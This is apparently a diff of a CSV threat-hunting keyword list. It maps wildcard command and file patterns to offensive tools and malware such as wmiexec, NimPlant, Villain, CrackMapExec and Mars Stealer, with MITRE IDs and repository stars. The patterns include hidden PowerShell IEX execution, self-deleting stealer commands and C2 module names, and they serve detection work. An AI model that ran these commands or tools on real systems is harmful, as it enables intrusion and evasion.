 "*cmd.exe /c *echo test > C:\Users\Public\test.txt*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z"
 "*cmd.exe /c rundll32.exe agressor.dll*stealth*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z"
-"*cmd.exe /c sc start plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
+"*cmd.exe /c sc start plumber*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z"
 "*cmd.exe /c timeout /t 5 & del /f /q *%s* & exit*","offensive_tool_keyword","mars stealer","Self-removal 'mars stealer' command","T1587","TA0002","mars stealer","","Malware","https://3xp0rt.com/posts/mars-stealer","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*cmd.exe /c zoom1.msi*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*cmd.exe /Q /c /start /min powershell.exe -nop -c*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral 
movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c *.bat *> \\127.0.0.1\ADMIN$\* 2&*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c /start /min powershell.exe -nop -c*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c hostname1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral 
movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c nslookup 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c powershell.exe -nop -w -hidden -c*IEX*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c powershelll.exe 1> *\\127.0.0.1\ADMIN$\* 2>*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral 
movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*cmd.exe /Q /c quser 1 > \\127.0.0.1\ADMIN$\*","offensive_tool_keyword","wmiexec","wmiexec.py from impacket used by metasploit","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/rapid7/metasploit-framework/blob/2722067108b5c034da9f77b95eaf1c1db33db4fa/modules/auxiliary/scanner/smb/impacket/wmiexec.py#L127","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*cmd.exe /Q /c start *stage1.exe 1*","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*cmd/backdoor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*cmd/backdoor.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*cmd/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/localrelay*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cmd/merlinagent/*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*cmd/merlinagentdll/*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - 
T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*cmd/setuid.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*cmd/setuid.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*cmd_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*cmd_powershell.cpp*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","1","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*cmd_shellcodex64.*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*cmd_shellcodex86.*","offensive_tool_keyword","Ninja","Open 
source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*Cmd-Execute-Assembly.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*Cmd-Inline-Execute.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*cmdinspector OFF*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*cmdinspector ON*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Cmd-Execute-Assembly.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Cmd-Inline-Execute.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*cmdinspector OFF*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*cmdinspector ON*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*cmdshell *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*Cmd-Shinject.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*Cmd-Upload.*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*cme -d * -*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation 
tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme -d *localhost*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme*-macOS-latest-*","offensive_tool_keyword","crackmapexec","macOS default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme*-ubuntu-latest-*","offensive_tool_keyword","crackmapexec","ubuntu default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme*-windows-latest-*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme/cme.conf*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*cme_bloodhound_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_dfscoerce_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_get-desc-users_pass_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_get-desc-users_pass_results*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_gpp_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_ldap-checker_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a 
bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_MachineAccountQuota_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_ms17-010_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_mssql_priv_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*cme_ntlmv1_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
